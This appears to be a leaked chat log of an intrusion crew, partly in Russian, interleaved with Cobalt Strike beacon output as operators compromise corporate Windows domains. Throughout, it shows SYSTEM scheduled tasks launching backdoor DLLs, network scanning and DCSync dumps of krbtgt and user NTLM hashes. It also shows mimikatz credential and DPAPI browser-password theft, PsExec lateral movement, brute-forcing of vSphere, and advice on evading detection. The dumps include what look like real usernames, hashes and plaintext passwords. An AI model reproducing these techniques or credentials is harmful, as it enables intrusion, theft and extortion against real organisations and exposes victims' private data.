ProgramDataUpdater                       12/22/2020 12:30:00 AM Ready

Folder: \Microsoft\Windows\Autochk
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Proxy                                    N/A                    Ready

Folder: \Microsoft\Windows\CertificateServicesClient
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
SystemTask                               N/A                    Ready
UserTask                                 N/A                    Ready
UserTask-Roam                                                   Disabled

Folder: \Microsoft\Windows\Customer Experience Improvement Program
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Consolidator                             12/21/2020 6:00:00 PM  Could not start
KernelCeipTask                           12/24/2020 3:30:00 AM  Ready
UsbCeip                                  12/24/2020 1:30:00 AM  Ready

Folder: \Microsoft\Windows\Customer Experience Improvement Program\Server
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
ServerCeipAssistant                      12/22/2020 1:56:36 PM  Could not start
ServerRoleCollector                      12/24/2020 12:54:11 AM Ready
ServerRoleUsageCollector                 12/22/2020 7:21:00 PM  Could not start

Folder: \Microsoft\Windows\Defrag
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
ScheduledDefrag                          12/23/2020 2:29:46 AM  Ready

Folder: \Microsoft\Windows\MemoryDiagnostic
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
CorruptionDetector                       N/A                    Ready
DecompressionFailureDetector             N/A                    Ready

Folder: \Microsoft\Windows\MUI
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
LPRemove                                 N/A                    Ready

Folder: \Microsoft\Windows\Multimedia
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
SystemSoundsService                                             Disabled

Folder: \Microsoft\Windows\NetTrace
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
GatherNetworkInfo                        N/A                    Ready

Folder: \Microsoft\Windows\PLA
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Server Manager Performance Monitor                              Disabled

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
AnalyzeSystem                            12/29/2020 10:09:27 AM Ready

Folder: \Microsoft\Windows\RAC
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
RacTask                                  12/21/2020 1:08:29 PM  Ready

Folder: \Microsoft\Windows\Ras
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
MobilityManager                          N/A                    Ready

Folder: \Microsoft\Windows\Registry
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
RegIdleBackup                            12/23/2020 12:22:55 AM Ready

Folder: \Microsoft\Windows\Server Manager
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
CleanupOldPerfLogs                       N/A                    Ready
ServerManager                            N/A                    Ready

Folder: \Microsoft\Windows\SoftwareProtectionPlatform
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
SvcRestartTask                           12/21/2020 8:51:55 PM  Ready

Folder: \Microsoft\Windows\Task Manager
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Daily Transformer Cube Builds                                   Disabled
Interactive                              N/A                    Ready

Folder: \Microsoft\Windows\Tcpip
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
IpAddressConflict1                       N/A                    Ready
IpAddressConflict2                       N/A                    Ready

Folder: \Microsoft\Windows\TextServicesFramework
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
MsCtfMonitor                             N/A                    Ready

Folder: \Microsoft\Windows\Time Synchronization
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
SynchronizeTime                          12/27/2020 1:00:00 AM  Ready

Folder: \Microsoft\Windows\UPnP
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
UPnPHostConfig                           N/A                    Ready

Folder: \Microsoft\Windows\User Profile Service
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
HiveUploadTask                                                  Disabled

Folder: \Microsoft\Windows\WDI
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
ResolutionHost                           N/A                    Ready

Folder: \Microsoft\Windows\Windows Error Reporting
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
QueueReporting                           N/A                    Ready

Folder: \Microsoft\Windows\Windows Filtering Platform
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange              N/A                    Ready

Folder: \Microsoft\Windows\WindowsColorSystem
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Calibration Loader                                              Disabled

Folder: \Microsoft\Windows\Wininet
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
CacheTask                                N/A                    Ready

Folder: \OfficeSoftwareProtectionPlatform
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
SvcRestartTask                           12/21/2020 11:19:45 PM Ready

Folder: \Scheduled Server Reboots
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Reboot (on demand)                       N/A                    Ready
Scheduled Server Reboot                  12/27/2020 9:45:00 PM  Ready

Folder: \Symantec Endpoint Protection
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Symantec Endpoint Protection Error Analy N/A                    Ready
Symantec Endpoint Protection Error Proce 12/22/2020 2:47:08 AM  Could not start
```
Show me the damn schtask on that machine already
NOT ALLOWED
You can't run it more than once
You almost wrecked the system
I've said it a hell of a lot of times already
1 DLL = 1 launch
Oh god
As you said
The DLL
???
I'm launching it via schtask
Tell me what
What the hell are you doing
One minute
```
beacon> shell SCHTASKS
/Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM [*] Tasked beacon to run: SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM [+] host called home, sent: 211 bytes [+] received output: ERROR: Invalid syntax. Cannot specify user name without specifying system name. Type "SCHTASKS /?" for usage. ```кукукакие 15 минут?чет нихера не быстро)исправляй рещекосякэто косяк(вот что за хуйняа, бля...смотри schtasks /queryты запустил штаском?ТАМ ПРЯЧЕТСЯ В СИСТЕМ32 И ЗАПУСКАЕТСЯ ИЗ ПОД СИСТЕМ ПРАВты запускаешь на сервереты блять ДАвот что за хуйня,kznm что это?Запустил, проверяй ``` C:\Users\cognos\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt01.dll ``x64сейчас дам дллшикарно, прыжок на сервак, и бекдор туда)малорик)ДА ``` * Username : daniel.harvey_adm * Domain : KORBEL * Password : W3lcome? * Username : adaudit * Domain : korbel * Password : #aud1T# * Username : ben.mandeville * Domain : KORBEL * Password : 1234qwerASDF!@#$ ``шары смотри сразу мб текущий пользак куда уметрастов нет`` The request will be processed at a domain controller for domain korbel.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- adaudit agpm_admin barry.levine_adm ben.mandeville_adm carol.macdonell_adm daniel.harvey daniel.harvey_adm dcbackup Honcho Jcomfort josue.gonzalez josue.gonzalez_adm kbveeamadmin KB-WMI-Monitor panuserID Russell.Bartson_adm SMSadmin SMTP-Relay solarwindows SolarWinds-LDAP sqlbackup switchscan tracy.mcmahan_adm vcentersvc veeamadmin The command completed successfully. [+] received output: The request will be processed at a domain controller for domain korbel.com. 
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
adaudit                  carol.macdonell_adm      daniel.harvey_adm
Honcho                   josue.gonzalez_adm       Russell.Bartson_adm
SMSadmin                 SMTP-Relay               sqlbackup
vcentersvc
The command completed successfully.

[+] received output:
The request will be processed at a domain controller for domain korbel.com.

Alias name     administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
carol.macdonell          ContentSubmitters        Domain Admins
Enterprise Admins        Honcho                   josue.gonzalez
SMTP Relay               Tmcmahan                 tracy.mcmahan_adm
The command completed successfully.
```
Yes
I went to help, ok
Yes?
Leave it for now, yes
Is there anything else for me to poke at, or should I go help?
I'm telling you, just the live ones
That's all
```
beacon> portscan 10.1.10.0/16 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.1.10.0/16
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.1.10.20' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.1' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.11' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.59' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.100' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.103' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.104' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.210' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '10.1.10.251' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.240' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.250' is alive. [read 8 bytes]
```
Portscan over a /16 mask
Okay, dumb question: how?
Nobody in the office gave an answer
Check whether there are workgroups nearby
Well, they're simply alive under the /16, that's all
We had 24
A 16 mask
What?
I don't remember that from yesterday
Yes
ICMP?
Set a port scan on the /16 mask
There's the dcsync
There's the scan
What should I do now
```
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
    7-Zip
    Common Files
    Common Files
    Internet Explorer
    Internet Explorer
    Microsoft Office
    Microsoft Office 15
    Microsoft.NET
    ModifiableWindowsApps
    ossec-agent
    Teams Installer
    UNP
    Velociraptor
    Windows Defender
    Windows Defender
    Windows Defender Advanced Threat Protection
    Windows Mail
    Windows Mail
    Windows Media Player
    Windows Media Player
    Windows Multimedia Platform
    Windows Multimedia Platform
    Windows NT
    Windows NT
    Windows Photo Viewer
    Windows Photo Viewer
    Windows Portable Devices
    Windows Portable Devices
    Windows Security
    WindowsPowerShell
    WindowsPowerShell
    InstallLocation    REG_SZ    C:\Program Files\7-Zip\
    InstallLocation    REG_SZ    C:\Program Files (x86)\Microsoft Office
```
I launched it and then remembered there's no Chrome there
SharpWeb, by the way, doesn't seem to grab Chrome; unfortunately Chrome has to be done through SharpChrome or mimikatz
Even before the DC
I did
This is without
```
10.1.10.11:445 (platform: 500 version: 10.0 name: LENDING3 domain: NORTHERNTRUST)
10.1.10.20:445 (platform: 500 version: 10.0 name: FILE1 domain: NORTHERNTRUST)
10.1.10.59:445 (platform: 500 version: 10.0 name: ACC1 domain: NORTHERNTRUST)
10.1.10.100:445 (platform: 500 version: 10.0 name: HR1 domain: NORTHERNTRUST)
10.1.10.103:445 (platform: 500 version: 10.0 name: IT1 domain: NORTHERNTRUST)
10.1.10.104:445 (platform: 500 version: 10.0 name: LENDING1 domain: NORTHERNTRUST)
10.1.10.210:445 (platform: 500 version: 10.0 name: AUTOMATE1 domain: NORTHERNTRUST)
10.1.10.240:445 (platform: 500 version: 6.3 name: BACKUP1 domain: NORTHERNTRUST)
10.1.10.250:445 (platform: 500 version: 6.3 name: DC1 domain:
NORTHERNTRUST) 10.1.10.251:445 (platform: 500 version: 10.0 name: DC3 domain: NORTHERNTRUST) `````` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (All Users) === === Checking for Firefox (All Users) === === Checking Windows Vaults === ```а дай дамп браузера с пк откуда начално без `icmp 1024`у меня есть портскан короче по 445у всех?там одна подсеть 10.1.10.0вспомниай)по 443 как вчера?делай рассканну у тебя трастдампа я не вижутак, теперь разбор нетворка, получается? Вот из ад_комп все серваки ``` DC1.Northerntrust.local DC3.Northerntrust.local Automate1.Northerntrust.local Backup1.Northerntrust.local File1.Northerntrust.local ``[ ](https://mediaeveryone.com/group/northerntrust-local?msg=Z759CRfjaC2xtFvXv) делал как знаюофкбрутил?)`` '.\Administrator:Abcd1234!' Administrator ```у меня есть ДАя получил сессию на ДК@tl1 еуна`` [DC] 'Northerntrust.local' will be the domain [DC] 'DC1.Northerntrust.local' will be the DC server [DC] Exporting domain 'Northerntrust.local' 502 krbtgt 3dbe670716ca04f747c58e2410985c37 514 2107 rperkins 25c1c24f244b4b38ddd008f5e5e04dc5 512 2109 darmstrong dcd25a439cd39daa6baeb6c02e88a9e6 512 2110 pgardner 1b638783b0af77e01bcb54fac1c9e938 512 2113 vlane ae67ca4ce0dd712cf628575c9439651d 512 2114 jwalsh 0ea6bede65067837ca818ac7381b9ac9 512 2116 lbrewer e04b29f420b76b1de7405d42db33296e 512 2123 PRINTER1$ d71638bf9374e98d9bedc6b6c32de6fb 4128 2124 PRINTER2$ 9b3c84a8ab5f5e10fa062bb7b89dc3f0 4128 2125 HR3$ a88292f68cd62e0dff57c5edbdfad160 4128 2128 IT2$ 51de61363b4c3e0c3bc9dbf394b834ee 4128 2129 IT3$ eeb1b544374ad054be4c3a37f2409f46 4128 2132 security 55e9dd76e1b4c8cdef934988600ad2b4 66048 2133 MARKET1$ 78690dbb6c0526d278300c76bdf40c6d 4128 2134 MARKET2$ 5c6a44e156b5633fbc5822ce8cc3bfa9 4128 2135 MARKET3$ cd4a3826128079306a570a83fb359318 4128 2122 networkservices 
774ec9de93bc164d7e7dd3f7022b9ddf 66048 2106 spayne ec4408935ee4d46b9c4093947015c410 512 2136 srivers c4b0e1b10c7ce2c4723b4e2407ef81a2 512 2137 boniel 33a09024bd0389b1ced865a291d0199c 512 2104 ghawkins acbfc03df96e93cf7294a01a6abbda33 66048 2138 LENDING4$ 6c13631c0d6b31fd187f4711fe223620 4096 1105 AUTOMATE1$ 82d4822fd7edb2932db2525042d23ad6 4096 1104 DC3$ 0d24da494b1f4f15f4e6a79444e70f90 532480 1106 HR1$ 3c3ed7115e70468341b2f545d5d44639 4096 1109 LENDING1$ a934860dbc89364c28c4d2ada48dc792 4096 2102 IT1$ 6db2362e97d455705f3fdd235382ee14 4096 1107 ACC1$ 0d944ee41ec7b7fb57e41811519010d7 4096 2130 FILE1$ a488233c032861f97e34ba50b73b99fd 4096 1001 DC1$ 54c071b65d14c02a3f3ffc638b16c8b5 532480 1108 BACKUP1$ 2e2060b3b2eb7a0b61dcbf918ee498ac 4096 2127 LENDING3$ 102434085c8a288797aec02654f619e3 4128 2126 LENDING2$ 3c507247472925acf99b8c1fe532a645 4128 2105 ehart cef2eb521883d390b32b0b5bb916f7bb 66048 500 Administrator e20e81c5c06ccf288474c581f13423b9 512 2103 rbradley 64f12cddaa88057e06a81b54e73b949b 66048 3602 fgarbo 1d32ad40cecbc0419f99a08e0845dd66 66048 ```вас 6 человек, гайды все естьладно, делай как знаешь)я понял, в параметре hostlist?в шарфайндерев хост-листе то?указание дк?или...?не по хостлисту же пускатьв исходниках есть параметр, но с ним не отработало такжеи посмотри гит, мб там есть параметр прямого указания домена`` beacon> psinject 1636 x64 Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt [*] Tasked beacon to psinject: Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt into 1636 (x64) [+] host called home, sent: 133723 bytes [+] received output: ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or ERROR: could not be contacted. 
ERROR: "
ERROR: At line:849 char:9
ERROR: +         $CompSearcher.FindAll() | ForEach-Object {
ERROR: +         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : COMException
ERROR: WARNING: [!] No hosts found!
```
Not enough arguments
```
beacon> psinject 1636 x64 Invoke-ShareFinder | Out-File sharfindINFO.txt
```
What command was it
He says he doesn't know
Didn't ask about this error
What answers does the TL have on hand
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
Northerntrust.local
```
Check the domain, maybe they disconnected it
It doesn't seem to be cut off from the domain
I ran ShareFinder, it spat this out, I take it there are no shares there :thinking:
```
[*] Tasked beacon to remove C:\Windows\Temp\wpinfo
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: +         $CompSearcher.FindAll() | ForEach-Object {
ERROR: +         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : COMException
ERROR: WARNING: [!] No hosts found!
```
You have everything
You have the guides, you have the forum, you have the mindmap
And when he runs out of ideas, then come to me
Just the right time to ask your team lead
Brute? Huh? Huh? Huh?
I've run out of ideas
Found disk D, it won't open
jUsT kIdDiNg, JoKeS
Didn't get it
Well, not with schtask though
AD?
ты же его уже сняли так есть с чем работатьокей делаю токен снимаю адда тут и брутить не надовсе имет смысл пока нет ДАокей локальных пользователей плюсом в брут закинуть будет иметь смысл?ну хд я после сделалвыше написалкак не упало кредов кроме текущего пользака то?[ ](https://mediaeveryone.com/group/northerntrust-local?msg=swYfpm9XBJ7NGMKpu) ?скорее всего системные аккитак это локальные пользователиих в ад_юзерс нет :thinking:+одинаковые пароли`` OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9::: setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9::: `````` setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::Abcd1234! `````` Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9::: setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ae49429db3a99d5b0af02187c1873deb::: ```нужна подсказка по векторам, мне никаких кредов упало кроме нтлм хэша текущего пользователя, он на своей тачке ЛА, но там мало полезного его машина состоит в OU=Lending есть ещё такие тачки, имет смысл пингануть их и брутануть на предмет ЛА?`` Domain Controllers: Server Name IP Address ----------- ---------- DC1 10.1.10.250 DC3 10.1.10.251 `````` Authentication Id : 0 ; 49752863 (000000:02f72b1f) Session : Interactive from 2 User Name : fgarbo Domain : NORTHERNTRUST Logon Server : DC1 Logon Time : 10/3/2020 9:56:59 AM SID : S-1-5-21-1968562247-2146563082-3767082923-3602 msv : [00000003] Primary * Username : fgarbo * Domain : NORTHERNTRUST * NTLM : 1d32ad40cecbc0419f99a08e0845dd66 * SHA1 : eeb76229fed887393f7880b224edf87683e69dd3 * DPAPI: 
532039ed13c7c6b6d3b3986a446888e4 tspkg: wdigest: * Username : fgarbo * Domain : NORTHERNTRUST * Password : (null) kerberos : * Username : fgarbo * Domain : NORTHERNTRUST.LOCAL * Password : (null) ssp : credman: Authentication Id: 0; 49752778 (000000:02f72aca) Session : Interactive from 2 User Name : fgarbo Domain : NORTHERNTRUST Logon Server : DC1 Logon Time : 10/3/2020 9:56:59 AM SID : S-1-5-21-1968562247-2146563082-3767082923-3602 msv : [00000003] Primary * Username : fgarbo * Domain : NORTHERNTRUST * NTLM : 1d32ad40cecbc0419f99a08e0845dd66 * SHA1 : eeb76229fed887393f7880b224edf87683e69dd3 * DPAPI: 532039ed13c7c6b6d3b3986a446888e4 tspkg: wdigest: * Username : fgarbo * Domain : NORTHERNTRUST * Password : (null) kerberos : * Username : fgarbo * Domain : NORTHERNTRUST.LOCAL * Password : (null) ssp : credman: Authentication Id: 0; 49665170 (000000:02f5d492) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 10/3/2020 9:56:39 AM SID : S-1-5-90-0-2 SV : [00000003] Primary * Username : LENDING3$ * Domain : NORTHERNTRUST * NTLM : 102434085c8a288797aec02654f619e3 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf tspkg: wdigest: * Username : LENDING3$ * Domain : NORTHERNTRUST * Password : (null) kerberos : * Username : LENDING3$ * Domain : Northerntrust.local * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG Encrypted Key found in local state file > Encrypted Key seems to be protected by DPAPI URL : https://www.pizzahut.com/ ( https://www.pizzahut.com/index.php ) Username : uzxmvlcsyosjluxudo@upived.online ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption ``https://github.com/twelvesec/passcathttps://github.com/djhohnstein/SharpChromiumпопробовал с открытым и с закрытым браузером на всякийне нашелвсе. 
не один не подошел(найдет твои доступы?`https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1`да\дапш включен?точно сохранила, понялпросто зарегайся типо и сохрани доступы в браузеренедоступы чего? с мимика?и сохрани доступы где нибудьпоставь плизнет, но скачать не проблема)у тебя на дедике есть едж?у меня так же(``` URL : https://norex.growthzoneapp.com/ ( https://norex.growthzoneapp.com/ap/Events/Register/yr4Y1Rop ) Username : mattpeterson@gophersport.com ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption ``чет не подошел ни один ключ(пока нетникто не подошел?2 осталоськак там дела у @user4 ?уже не вижу)а неу меня через f7ae192f-64d6-41fa-a58a-ab726048ad7bлол[ ](https://mediaeveryone.com/group/gophersport-com?msg=Mns5nepoJGuGZKiyn) этону я на все сделалчерез какой гуид? через этот -`` f7ae192f-64d6-41fa-a58a-ab726048ad7b ``` или что ты имеешь ввиду?это ты через какой?`` [domainkey] with RSA private key key : 75597592e90e408290b2e532ed2015557eec0d4296b4517babd2e9ac26c4599cb1b23e13a3a0ba08e5ea951c69a6d773e629a37837db02ddbbf449c207bb960e sha1: adf71515a86e4350f103949a74d8ab9cace0237b sid: S-1-5-21-1434170147-1247748403-2213390517-18832 `````` sha1: 3271ea02988401e642deda7ca35b0503ec2ba7d1 sha1: f3f2faac309b0dfa98170f1a472493c7c42e0a3c sha1: 3a048c41afa9f7d99d80a8c3b4d894f165a2f8fa sha1: 5fc489d886bdceb4279e553361552c9910bc3d41 sha1: 0aa6cd2493ace9e5a41a22989b9cab7bfe93c857 sha1: adf71515a86e4350f103949a74d8ab9cace0237b ``все 6 перебери и скинь результатпроверь сначала это`` mimikatz # dpapi::masterkey /in:b8854128-023c-433d-aac9-232b4bca414c /pvk:ntds_capi_0_32d021e7-ab1c-4877-af06-80473ca3e4d8.pvk ``только бэкап логиндаты сделайсид останется одини просто перебери 6 гуидов)качай все файлы + самый свежий мимик на дедиктут даже попроще+нам надо их подкинуть на дедик и там расшифвровать как я понял и + надо знать под каким гуидом он ходил в ейджзабрал его гуидына скрине 1190у нас около 1кбда 
Seems to be one and the same.
Too small.
It needs a .pvk, and that one is some other kind of .pvk.
Clean up.
Grab the files.
Good to know.
Yes, I just deleted those files, I wanted to dump the key to another folder.
He understood me )
What are you talking about?
That kind of thing makes a lot of noise.
Once would have been enough.
Don't do that again.
Write the logins with the domain?)
Oh, no. My mistake ))
And like this, and then nothing further.
:zany_face:
Cheater )
Yep.
And from there you did it on the DC itself?
You opened a session right on the DC.
Well, I had them too, but on the DC it worked.
I had errors.
How?
On the DC z1ad2:
```
beacon> mimikatz !lsadump::backupkeys /system:z1ad2.gophersport.local /export
```
ilo2m24422ldv.gophersport.local
Not in ad_comp.
For now run at least 1.
2 are missing. Well, who knows. They exist like this:
`https://ilo2m24422ldv.gophersport.local/z1DC1ESXi2`
))
Except two.
Are they all there?
Check the nix hostnames against his history.
Both are reachable.
There are 9 nix boxes in ad_comp, and roughly half have the vSphere web UI.
Good question )
Are these 2 systems?
vc-z2dc1
And why does it have 2 hosts, vcz1dc1?
Brute the pairs.
Just don't brute against root.
Yep.
It's a sqlite file.
I think I sent it above -
From Edge.
Which Login Data?
And the browser is still lagging.
Dunno, it's from the Login Data file.
I didn't quite get it, are there 2 of them?
Did you get in?
By the way, the vSphere login is root.
https://10.2.0.11/ui/#/login
1 pair only 1 time.
And don't change the combination.
So that there are no traces of previous logins.
Reset the browser after each attempt.
Got it.
1 time.
Into vSphere.
Where?
Put up a socks and try them for login.
+
They overlap. All the EA are DA too.
Or are they all DA and the first 4 are EA+DA?
I see 12 DA.
Really all DA?
We'll find out )
Well yes, only the latest ones are on Chromium.
Isn't mimi tuned purely for Chrome?
And as a consequence the way credentials are stored is the same.
It seems the latest versions of Edge are on the Chrome engine.
Talked to people.
As far as I understood.
Is the article talking about Chrome, or does mimi accept everything on Chromium?
A window is all it's capable of )
But if the built-in one was enough for you to launch the payload, then it's simpler to use that.
Well yes, for working with the admin )
We got by with the built-in one, but you said this one should be used )
And I also don't get why you moved to psexec if you managed without it before )
```
beacon> shell PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[*] Tasked beacon to run: PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[+] host called home, sent: 118 bytes
[+] received output:
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
```
Study this:
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
Go ahead.
I'll send the creds now.
Decide for yourselves.
The second one is working together with me.
And sends me the list.
One of them is now collecting working hashes of all the EA, DA.
Oh right, didn't think of that.
Let's do it like this.
But the traffic isn't flowing.
Ping to my cobalt goes through.
Unlikely.
And if the admin has an IP whitelist, which is why sessions don't come through, but z1gateway is in the whitelist, can we pull in z1gateway and try to pull in the admin's computer through a pipe?
So, are we going to screw around with masterkeys?
Don't touch anything without me for now.
For your reading:
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
20 min break.
It's going to be hard now.
Well then.
Uh-huh.
PS is apparently disabled altogether.
Let's play with his PC.
Yes.
Well, "gateway" sort of hints at it ))
So he goes through VPN.
Yep.
Process list from this host.
`10.22.0.13:3389 z1gateway:51889`
Take a netstat and see where he even came from.
Although we don't have his cleartext.
If we have psexec, maybe try enabling parallel access and go over RDP?
Go ahead.
Can it be done not encoded?
Well, I sent it encoded.
I see you already ran it.
Good timing.
I want to send a PS payload via psexec; in base64 it's too long, can I fire it unencoded?
It didn't arrive.
Yes, I'm waiting.
Let me go first.
Misclick...
Didn't get it?
```
6984153 beacon> desktop
```
And use the original.
Use it only to test whether psexec can be used at all.
4) the built-in psexec is crap
It's a VM.
He's connected here via RDP.
```
msedge.exe 10864 RDP-Tcp#1
```
Pay attention:
3) Excel is closed
:skull_crossbones:
2) his PC
1) yes, he has Edge
Each exec?
No.
It's accepted once, the EULA.
I wrote taslist.
Clumsy me.
Apparently that's the trouble.
Yes.
The system cannot find the file specified.
accepteula?
Do you really not see the difference?
Hands off.
Damn, enough already.
Blow, baby.
Now it's more interesting.
```
The system cannot find the path specified.
```
No.
Yes, I'm just checking a hundred times.
Everything is going kind of slowly with you guys.
Work.
By yourselves _))
Ahaha.
Maybe you pulled a prank and uploaded x32?
Fixed it, damn it )
I don't get it, which path can't it find?
```
The system cannot find the path specified.
```
To try without specifying a path.
Why was that?
c:\Windows\System32\PsExec.exe
The exe was uploaded a long time ago.
And not used yet.
You've been sitting on this quite a while.
That's it, it's no longer relevant )
And what does /q have to do with it?
Ah, well, we already specified /q anyway.
Agreed )
```
-d Don't wait for process to terminate (non-interactive).
```
So psexec doesn't have flags like that, it seems.
In the spirit of non-interactive.
Don't forget to set the other flags too.
Because tasklist is just a step in the work, not the main goal.
Let's look for a working way of executing via psexec right away.
No.
Maybe pslist.exe?
This switch is mandatory:
```
-s Run the remote process in the System account.
```
Of the alternatives we'll have RDP left.
But it's worth re-checking with the original and with creds specified directly.
Not 100% info.
That's my version.
And the service itself on the PC has nothing.
Your DA rights are spent on that.
You have rights to create a SERVICE on the PC.
Yes.
But we're under the token of that DA, which we're breaking in with.
For the simple reason that the current access level is a service one and simply has no rights to the system utilities.
Let's move to the classic:
```
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
```
From the service ones.
Which DA has it?
Nope.
Don't we have his cleartext?
The file is also empty, under his token.
Put some of the sessions into sleep.
Re-made the token because it seems the domain was specified wrong.
Did it three times now, at the start of the day too )
Ah, who did the second one?
Socks 1
1) I see you're re-making your tokens several times (why?)
2) you have a SHITLOAD of active sessions in cobalt (you do realize how insanely noisy you are?)
3) why 2 active socks??
What are you doing?)
Give me access to the working cobalt.
And check the process list again.
Make his token.
No, under a different DA.
Are you breaking in there under his context?
Well, apparently he has it open - not everything will pack.
Better grab the folder.
THIS?
Grab his Edge data.
Likewise.
Without the dll?
No.
Upload straight to the admin's?
Attempt 2.
Something weird is going on with the session there. Nothing works there at all.
Ah, user4 will come and say he went out for a smoke.
Here.
The scan always showed there was RDP.
What's the error? I got confused ))
And what was the error before that?
I mean, it's visible )
But I'll try.
And how did he see RDP if before that you sent a scan that says it doesn't see it?
I don't think they'll fit, all the workstations have different passwords.
Check them against the file )
They have these things on the workstations in ad_comp.
They show up in AD.
There is, it seems, a password for the LA of the admin's PC.
Old. There is no pass of his, only service accounts.
His pass didn't work?
There's an xlsx file with IT passwords, but it's password-protected )
Sometimes they appear on the network.
Could of course also check the FS, browsers.
Same thing there as here: schtask, RPC not reachable, sessions don't come through.
Admin ones.
Also their laptops are joined to AD.
There are two of them, the second is kind of dead; we have his machine but it's empty.
Let's look for more admins for now.
And schtask is apparently covered by a firewall.
